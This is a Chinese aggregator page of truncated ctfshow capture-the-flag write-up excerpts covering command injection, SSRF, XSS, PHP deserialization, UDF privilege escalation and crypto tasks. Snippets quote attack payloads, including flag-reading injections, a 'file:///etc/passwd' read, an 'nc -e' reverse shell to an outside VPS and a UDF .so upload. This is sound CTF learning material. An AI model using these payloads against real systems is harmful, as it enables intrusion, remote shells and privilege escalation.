E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
ctfshow
ctfshow
萌新赛经验总结
签到题就从做题顺序开始记录,这题真的很签到。有system函数在,应该就是命令执行了。唯一注意的点就是分号分隔一下。用;ls;查看flag文件,再用;catflag;得到flag。给她刚开始还不知道题目名字的含义,就一直在那注入,后来才知道给她翻译过来就是git,git泄露得到源码一部分。addslashes函数就是对pass传进来的数据进行过滤,把预定义好的单双引号和反斜杠都进行了转义。这里就要
XiLitter
·
2022-10-09 11:58
#
web
php
开发语言
ctfshow
-卷王杯
easywebeasyunserializeeasyweb源码提示数组溢出+原生类读取c=9223372036854775806&a=DirectoryIterator&b=glob://flag[0-9a-z]*.phpc=9223372036854775806&a=SplFileObject&b=flag56ea8b83122449e814e0fd7bfb5f220a.phpeasyunser
Fnylad
·
2022-10-09 11:28
php
开发语言
后端
ctfshow
卷王杯
ctfshow
卷王杯写在前面:这次的做出一道php题,通过这次的比赛,深入理解反序列化漏洞,通过复现学到了很多新的点参考一篇特别详细的wpeazyunserialize(复现)源码";global$flag
Y3g@d
·
2022-10-09 11:56
Write
Up
python
深度优先
宽度优先
CTFSHOW
新生杯web
easy_eval利用script标签绕过code=system("cat/f*");不过只有php5可以用剪刀石头布考查session反序列化漏洞。不同的session处理器会导致反序列化漏洞,具体的可以参考下这篇文章https://www.jb51.net/article/107101.htm题目中通过ini_set将session的处理器改为了php,而在phpinfo中可以看到默认的为ph
yu22x
·
2022-10-09 11:24
前端
php
安全
CTFShow
代码审计
CTFShow
代码审计Web301Web302Web303Web304Web305Web306Web307Web308Web309Web310Web301题目环境,用Seay自动审计了一下,啥也没找出来自己来
paidx0
·
2022-09-28 22:19
CTFShow刷题篇
web安全
ctfshow
-萌新(持续更新)
感谢
ctfshow
平台供题,平台地址:https://ctf.show/2021年1月23日,大吉大利杯盛大开幕,欢迎小伙伴们前来参赛目录萌新认证萌新_密码1萌新_密码2萌新密码3萌新密码#4隐写1隐写
i_kei
·
2022-09-26 07:15
CTFshow
信息安全
ctfshow
做题 萌新 模块(1)
ctfshow
做题萌新模块(1)——萌新认证加qq群发“萌新码”得到萌新快乐码。————萌新_密码1可以猜测出,显示的是一串16进制码。
Goodric
·
2022-09-26 07:39
做题
ctfshow
萌新
ctfshow
web入门 php特性
web89intval()函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组涉及到了一个三目运算$_GET?$_GET=&$_POST:‘flag’;//如果使用GET传参,则使用POST传参来代替$_GET[‘flag’]==‘flag’?$_GET=&$_COOKIE:‘flag’;//如果GET传参flag的值=flag则将c
Sentiment.
·
2022-09-23 20:20
CTFshow
CTF
WP
网络安全
其他
前端
ctfshow
密码挑战
真·biginner给出了m=PolynomialRing(Zmod(Ns[i]))f=x+pas[i]f=f.monic()#print(f)p_solve=f.small_roots(X=2**160,beta=0.42)#ps.append(int(p_solve[0]+pas[i]))print(ps)defdecrypt(c,d,n):returnpow(c,d,n)fromCrypto
PUTAOAO
·
2022-09-23 13:02
刷题记录
其他
CTFSHOW
七夕杯web
文章目录web签到easy_cmdeasy_cmdeasy_sqlweb签到有长度限制payloadls/>anl/*>a然后访问a即可得到flageasy_cmdpayloadnum1=1;include"/var/log/nginx/access.log";&symbol=-&num2=3然后就是日志包含那一套easy_cmd通过nc-e向自己的vps传递命令ncx.x.x.xport-els
yu22x
·
2022-09-20 08:08
linux
运维
服务器
ctfshow
终极考核web654
web654上传上去木马后进行udf提权参考文章so文件下载地址提取码:pgns因为不好直接上传so文件,可以先将他在本地base64编码cata.so|base64然后把输出的内容复制下来可能有换行需要给去掉echo"f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA0AwAAAAAAABAAAAAAAAAAOgYAAAAAAAAAAAAAEAAOAAFAEAAGgAZAAEAAA
yu22x
·
2022-08-02 08:54
sql
ctf
ctfshow
网络迷踪做题记录(2)
ctfshow
网络迷踪做题记录(2)——致我超吧题目描述:
ctfshow
{主角ID_vs_对手id}(全小写)下载附件为gif图片展示某个游戏的战斗。。咱也不知道是啥游戏。
Goodric
·
2022-07-25 10:27
做题
ctfshow
网络迷踪
ctfshow
网络迷踪做题记录(1)
ctfshow
网络迷踪做题记录(1)——新手上路找桥的名字。附件为一张海边图片。百度识图为蜈支洲岛,得到地点名,但还需要具体桥的名字。再用搜索引擎搜索关键字,就可以看到结果中的“情人桥”。
Goodric
·
2022-07-25 10:27
做题
ctfshow
osint
ctfshow
之web(9、10、11、12)
目录萌新web9web10:web11:web12萌新web9提示是在config.php文件里面highlight_file()函数对文件进行PHP语法高亮显示。语法通过使用HTML标签进行高亮。提示:用于高亮的颜色可通过php.ini文件进行设置或者通过调用ini_set()函数进行设置。注释:当使用该函数时,整个文件都将被显示,包括密码和其他敏感信息!highlight_file('conf
沃和莱特
·
2022-07-24 12:29
ctf
php
开发语言
[WEB]php特性
因为没钱充
ctfshow
会员,只能跟着视频教程白嫖89intval绕过提交一个不为空的数组即可绕过?num[]=//就直接绕过了intval详解90进制转换直接绕过?
开心星人
·
2022-07-20 15:40
Web安全
web安全
php
CTFSHOW
反序列化篇
文章目录web254web255web256web257web258web259web260web261web262web263web264web265web266web267web268web269web270web271web272、273web274web275web276web277278笔者太菜了,没解出来261T_Tweb254没搞懂和反序列化有啥关系,直接传username=xxxx
yu22x
·
2022-07-04 21:16
CTFSHOW
web入门系列
CTFSHOW
SQL注入篇(231-253)
文章目录231232233234235236237238239240241242243244245246247248249250基础语法数据库操作集合操作251252253231update注入题目里面其实是存在两个功能的,一个是update,还有一个select。不过我们访问update.php,就知道执行了。所以只要把查询表或者列的语句更新给用户名或者密码就可以了。#获取所有表名passwor
yu22x
·
2022-07-04 21:45
CTFSHOW
web入门系列
sql
web安全
安全
CTFSHOW
框架复现篇
文章目录web466web467web468web469|web470web471web472web473web474web475web476web466反序列化格式/admin/序列化串base64参考文章https://xz.aliyun.com/t/11002payloadextensions=[''=>'system'];}}}namespaceIlluminate\Broadcastin
yu22x
·
2022-07-04 21:15
CTFSHOW
web入门系列
ctf
CTFSHOW
权限维持篇
文章目录web670-web676web677、web678web679web670-web676题目在进行check后,会删掉网站根目录下的所有文件。方法一预测是使用的如下命令echo'flag{xxxx}'>/flag_xx.txtrm-rf*rm-rf*其实有个小缺陷,无法删除点号开头的文件,所以可以利用给的木马生成一个.shell.php的木马,check后还会保留。方法二使用反弹shel
yu22x
·
2022-07-04 21:15
CTFSHOW
web入门系列
php
开发语言
web351-360(
ctfshow
刷题记录)
SSRFweb351#curl_init—初始化cURL会话 #curl_setopt—设置一个cURL传输选项#curl_exec—执行cURL会话#curl_close—关闭cURL会话这一题并没有过滤,传入的url直接执行,所以可以使用file协议去读文件url=file:///etc/passwd或者直接访问该文件url=http://127.0.0.1/flag.phpctfshow
北子Beizi
·
2022-06-29 16:22
php
web安全
ctf.show刷题记录_web(1-10)
ctf平台(
ctfshow
)`https://ctf.show/1、签到解题:base64解码
ctfshow
{0da357d0-359b-47e1-80dc-5c02212725e5}2、web2解题:
god_mellon
·
2022-06-29 15:15
CTF
前端
bash
linux
[
ctfshow
]web入门——文件上传(web156-web163)
[
ctfshow
]web入门——文件上传(web156-web163)[
ctfshow
]web入门——文件上传[
ctfshow
]web入门——文件上传(web156-web163)web156上传.user.iniweb157web158web159web160
shu天
·
2022-06-28 14:24
ctf
#
web
php
web
ctf
文件上传
[
ctfshow
]2022 新春欢乐赛 wp
热身开局看到源码,但是却没有显示源码的代码。那么只能是被包含进去了,直接phpinfo搜prepend可以看到包含的文件,查看之得到flag。?f=system("tacetc/ssh/secret/youneverknow/secret.php");web1highlight_file(__FILE__);error_reporting(0);$content=$_GET[content];fi
Snakin_ya
·
2022-06-28 14:32
刷题记录
php
开发语言
后端
ctfshow
web(日志注入&简单回显盲注&&with rollup注入绕过)
web3php伪协议的标志。没有提示我们flag在哪个文件,filter试一下flag.php,flag,txt,flag都没有用php://input试一下,burp抓包发现了ctf_go_go_go,应该就是我们的flag文件。post传入cat一下,得到flag。web4include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell;这一关相比
葫芦娃42
·
2022-05-26 18:18
ctfshow
php
开发语言
ctfshow
-web入门信息搜集(小宇特详解)
ctfshow
-web入门信息搜集web1-源码这个就比较简单了,直接f12去进行查看源码就找到了源码。
小宇特详解
·
2022-04-25 10:47
ctfshow
ctfshow
CTFSHOW
大赛原题篇(web771-web790)
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。暂时先更新到这了,毕竟还是要工作的。。。。文章目录web771web773web774web775web776web777web778web779web780web781web782web784web785web786web787web788web789web790web771GXYCTF2019你的名字题目过滤了{{}}只要使用就直接报错,
yu22x
·
2022-03-25 14:53
ctfshow
大赛原题系列
ctf
django
python
CTFSHOW
大赛原题篇(web756-web770)
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。文章目录web756web757web758web759web760web761web762web763web764web765web766web767web768web769web770web756code=GLOBALSweb757每次传入的key前七个字符需要是上传返回的,并且substr(md5($value),5,4)==0)因为不
yu22x
·
2022-03-25 14:23
ctfshow
大赛原题系列
ctf
django
python
CTFSHOW
xss篇
web316xss平台https://xss.pt/xss.php创建项目选择默认模块一直下一步,然后随便那个代码放到题目输入框中再刷新下题目最后看下项目结束web317、318、319317过滤了script318过滤了img在那些代码中找没有script和img的然后出不来flag就多试几次,我试的这个是可以的web320、321、322过滤了空格用tab键代替空格,代码还是用上面的web32
yu22x
·
2022-03-25 14:23
php反序列化之字符串逃逸详解
字符串逃逸过滤后字符串变多字符串变多原理详解过滤后字符串变少总结php反序列化–字符串逃逸PHP反序列化的字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础)过滤后字符串变多以
ctfshow
-web262
·
2022-03-18 15:05
CTFshow
-卷网杯-crypto-真·简单·不卷·现代密码签到(复现)
fromCrypto.Util.numberimportbytes_to_longfromsecretsimportp,q,r,s,t,flagn=p*q*r*s*te=2m=bytes_to_long(os.urandom(500)+flag)c=pow(m,e,n)print(p,q,r,s,t,sep='\n')print(c)'''14533236770094430374754891216
这就是强者的世界么
·
2022-03-11 10:40
CTF比赛实战
ctf
php反序列化之字符串逃逸
这里以
ctfshow
262为例。
二码农丫
·
2022-03-07 15:58
CTF日记
php
python
CTFshow
-php反序列化
详解wp可参考此处该博客仅提供大致内容,还望包涵。web255isVip;}publicfunctionlogin($u,$p){return$this->username===$u&&$this->password===$p;}publicfunctionvipOneKeyGetFlag(){if($this->isVip){global$flag;echo"yourflagis".$flag;
二码农丫
·
2022-03-07 15:57
CTF日记
php
web安全
2021
ctfshow
月饼杯web
随便写写给自己看,同时也热烈欢迎师傅的意见与批评web签到直接跑脚本。WelcometoCTFSHOW';echo'PoweredbyPHPthink5.0.2';echodirname(__FILE__);if(!empty($run[2])){echo'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';}if(!empty($run[1
二码农丫
·
2022-03-07 15:01
CTF日记
php
安全
网络安全
ctfshow
第二届月饼杯 misc部分writeup
ctfshow
第二届月饼杯misc部分writeup说是部分其实就一道月饼起义下载得到一个损坏的zip利用binwalk或者bandizip自带的修复都能得到一个hint.txt,解压后猜测是零宽隐写,
AshMOB
·
2022-02-22 12:37
ctf比赛wp
安全
ctfshow
SSRF web351-web360 wp
文章目录认识SSRFweb351web352web353web354web355web356web357web358web359、web360认识SSRF浅谈SSRF漏洞SSRF详解SSRF(Server-SideRequestForgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。web351可以访
是Mumuzi
·
2022-02-21 13:24
笔记
ctf
ctfshow
php
安全
web安全
ctfshow
XXE web373-web378 wp
文章目录web373web374-376web377web378web373XXE(XMLExternalEntityInjection)全称为XML外部实体注入。注入的是XML外部实体参考文章:一篇文章带你深入理解漏洞之XXE漏洞libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成:一个和号(&),一个实体名称,以及一个分号(;)fla
是Mumuzi
·
2022-02-21 13:54
ctf
笔记
ctfshow
信息安全
php
web安全
【
CTFSHOW
】web入门 NodeJS
web334web335web336web337web338web339web340web341web342web343web344参考资料写在前面web334下载附件,其中user.js得到用户名为:
CTFSHOW
不会敲码的小火鸡
·
2022-02-07 10:03
CTFSHOW
node.js
javascript
web安全
jquery
npm
ctfshow
nodejs wp
/modules/user').items;users变量是引入了user.js里面item的值,账号
CTFSHOW
,密码1234562.varfindUser=function(name,password
yink12138
·
2022-02-07 10:03
CTF修炼之路
前端
CTFshow
_终极考核_EXP
EXPALLINHEREexpexpexpヾ(・ω・`。)importrequestsimportbase64importreimporttimedefgetShell(url):burp0_url=url+"system36d/users.php?action=upload"burp0_headers={"Cache-Control":"max-age=0","Upgrade-Insecure-
ScyLamb
·
2022-02-07 10:33
CTFshow
信息安全
CTFshow
_终极考核_个人WP
CTFshow
_终极考核参考不打算参考0x00web640flag_640=
ctfshow
{060ae7a27d203604baeb125f939570ef}这里就陆陆续续记录些杂乱的做题笔记吧做之前提醒自己信息收集后果必有前因
ScyLamb
·
2022-02-07 10:32
CTFshow
安全
CTFshow
——组件漏洞
前言:组件漏洞最大的收获应该就是锻炼自己复现漏洞的能力吧2333,其次就是网上搜索漏洞的能力,很多组件都还没接触过,只得照着网上的分析来复现了文章目录前言:580——Bash远程代码执行漏洞“破壳”(CVE-2014-6271)581——yaml_parse()582——nodejs反序列化583——phpmailer组件584——Spring组件(CVE-2017-8046)585——Apach
D.MIND
·
2022-02-07 10:32
组件漏洞
ctfshow
XSS web316-web333 wp
可能写的有点啰嗦,记录自己做题的过程文章目录web316web317web318web319web320web321web322web323web324web325web326web327web328web329web330web331web332web333web316后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的
是Mumuzi
·
2022-02-07 10:32
ctf
笔记
ctfshow
php
xss
信息安全
ctfshow
1024杯
1024_WEB签到phpinfo中有个自定义的函数,不多说了,自己找找看把1024_柏拉图双写绕过file://,然后利用file协议读取文件,index.php现在是知道怎么过滤的了upload.phperror_reporting(0);if(isset($_FILES["file"])){if(($_FILES["file"]["type"]=="image/gif")&&(substr(
小Low娃
·
2022-02-07 10:32
CTF题目
php
ctfshow
phpCVE web311-web315 wp
可能写的有点啰嗦,记录自己做题的过程文章目录web311:CVE-2019-11043web312:CVE-2018-19518web313:CVE-2012-1823web314:日志文件包含web315:XDebug远程调试漏洞web311:CVE-2019-11043phpCVE,打开只有一个whereisflag页面,注释也就只说了cve于是去百度看看,发现这也太多了吧。看看群主的描述似曾
是Mumuzi
·
2022-02-07 10:02
ctf
ctfshow
笔记
php
ctfshow
代码审计 web301-web310 wp
废话可能比较多,主要记录自己从那么多文件中找漏洞点的过程文章目录参考博客web301web302web303web304web305web306web307web308web309web310参考博客https://blog.csdn.net/rfrder/article/details/113924013https://blog.csdn.net/miuzzx/article/details/1
是Mumuzi
·
2022-02-07 10:01
ctfshow
ctf
笔记
php
web安全
信息安全
ctfshow
-1024杯
比赛期间,太菜,没做出多少,赛后wp,记录一下文章目录Web1024_WEB签到1024_fastapi1024_hello_world1024_图片代理1024_柏拉图Misc1024_签到1024_重新签到1024_兔耳1024_调频收音机1024_非常简单1024_1024zip套娃1024_大威天龙Crypto1024_Trick1024_密码系统1024_麻辣兔头第七锅Web1024_W
airrudder
·
2022-02-07 10:30
CTF
ctfshow
ctf
ctfshow
NodeJs web334-web344 wp
文章目录什么是nodejsweb334web335web336web337web338web339预期解非预期解web340web341web342-343web344什么是nodejsNode.js是一个基于ChromeV8引擎的Javascript运行环境。可以说nodejs是一个运行环境,或者说是一个JS语言解释器而不是某种库Nodejs是基于Chrome的V8引擎开发的一个C++程序,目的
是Mumuzi
·
2022-02-07 10:00
ctf
笔记
ctfshow
javascript
信息安全
php
[
ctfshow
]入门2
目录web14(默认配置)web15(社会工程学)web16(探针泄露)web17(sql备份)wed18(js小游戏)web19(数据库泄露)web20(mbd文件)杂项5杂项6,杂项6杂项7杂项8杂项10杂项11隐写1隐写2萌新隐写5web14(默认配置)那我们访问editor,出现如下页面在图片里面找到fl000g.txt,放在网址中访问web15(社会工程学)右下角看到邮箱访问admin看
pipasound
·
2022-02-04 16:02
刷题记录
安全
[
ctfshow
]入门5
目录命令执行前言:web29web30web31web32web33web34web35web36web37web38web39web40web42web43web44web45web46web47web48web49web50web51web52web53web54总结misc42misc43misc44misc45misc46misc47misc48misc49前言:本文大量参考ThnPkm大
pipasound
·
2022-02-04 16:02
刷题记录
安全
[
ctfshow
内部赛]web wp
签到F12,有register.phpimportrequestsimportreurl1="http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/register.php"url2="http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/login.ph
Snakin_ya
·
2021-12-03 10:36
刷题记录
前端
安全
php
上一页
9
10
11
12
13
14
15
16
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他